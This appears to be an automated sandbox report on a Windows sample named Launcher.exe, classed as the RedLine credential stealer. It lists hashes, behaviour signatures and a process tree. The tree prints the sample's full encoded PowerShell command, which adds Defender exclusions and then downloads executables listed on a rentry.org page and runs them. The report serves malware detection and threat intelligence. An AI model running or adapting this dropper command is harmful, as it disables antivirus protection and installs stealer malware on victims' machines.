Analysis
-
max time kernel
13s -
max time network
17s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
19-07-2024 12:01
Static task
static1
Behavioral task
behavioral1
Sample
Launcher.exe
Resource
win10-20240404-en
General
-
Target
Launcher.exe
-
Size
74KB
-
MD5
1d9b7c3504dc9c037ec7e4df5e0d78fc
-
SHA1
37690eb13f157efe2d9e086f1da32a1035b51099
-
SHA256
1738c03bb5e929c9b0e8d8f87140ba0e090ee230546381f8edb14c98801de3cf
-
SHA512
8e89d40082599a8b426f8d4845902c2c2d6fd6c992828ea1509eced391af65943b7440569071c06a4f3fbbce63408ab144b916f0ad41e6bacf6a08fa008e58f9
-
SSDEEP
768:2ioS9lv8MNcPcDkVQbcPcRovHF1/d8qZv:voS9lUMGF1/dX
Malware Config
Extracted
https://rentry.org/lem9481291/raw
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral1/files/0x000900000001ac16-67.dat family_redline -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 2 1084 powershell.exe 4 1084 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
vcvpvb1f.iwd0.exepid Process 3568 vcvpvb1f.iwd0.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid Process 1084 powershell.exe 1084 powershell.exe 1084 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 1084 powershell.exe Token: SeIncreaseQuotaPrivilege 1084 powershell.exe Token: SeSecurityPrivilege 1084 powershell.exe Token: SeTakeOwnershipPrivilege 1084 powershell.exe Token: SeLoadDriverPrivilege 1084 powershell.exe Token: SeSystemProfilePrivilege 1084 powershell.exe Token: SeSystemtimePrivilege 1084 powershell.exe Token: SeProfSingleProcessPrivilege 1084 powershell.exe Token: SeIncBasePriorityPrivilege 1084 powershell.exe Token: SeCreatePagefilePrivilege 1084 powershell.exe Token: SeBackupPrivilege 1084 powershell.exe Token: SeRestorePrivilege 1084 powershell.exe Token: SeShutdownPrivilege 1084 powershell.exe Token: SeDebugPrivilege 1084 powershell.exe Token: SeSystemEnvironmentPrivilege 1084 powershell.exe Token: SeRemoteShutdownPrivilege 1084 powershell.exe Token: SeUndockPrivilege 1084 powershell.exe Token: SeManageVolumePrivilege 1084 powershell.exe Token: 33 1084 powershell.exe Token: 34 1084 powershell.exe Token: 35 1084 powershell.exe Token: 36 1084 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
Launcher.exepowershell.exedescription pid Process procid_target PID 4616 wrote to memory of 1084 4616 Launcher.exe 74 PID 4616 wrote to memory of 1084 4616 Launcher.exe 74 PID 1084 wrote to memory of 3568 1084 powershell.exe 77 PID 1084 wrote to memory of 3568 1084 powershell.exe 77 PID 1084 wrote to memory of 3568 1084 powershell.exe 77
Processes
-
C:\Users\Admin\AppData\Local\Temp\Launcher.exe"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdQBkACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawB4AGkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBoAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBxAGYAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADkANAA4ADEAMgA5ADEALwByAGEAdwAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAGMAdQBnACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZwBjAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZABjAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAGIAYQBxACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGwAegBwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBzAGEAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAcgB2AHYAIwA+AA=="2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Users\Admin\AppData\Local\Temp\vcvpvb1f.iwd0.exe"C:\Users\Admin\AppData\Local\Temp\vcvpvb1f.iwd0.exe"3⤵
- Executes dropped EXE
PID:3568
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
355KB
MD56c1c75b8e3f80bfdf738d23fb9f8a190
SHA18ec4cfcf959a157af6c296a12d7ec865c4ff4908
SHA2568c797eb6be050516d990bcf592f1ff3a20a9b0407ff4e4566e856f18dfbfb3b6
SHA5127f74c91fa96f43b1c90aecd0eb7f205e1fb391a2d8144624a9d6aceac62347f03bfd7867d89f4b1007f09c0386ffa2b01c44436c1e8ef0fb2739c2bead73269b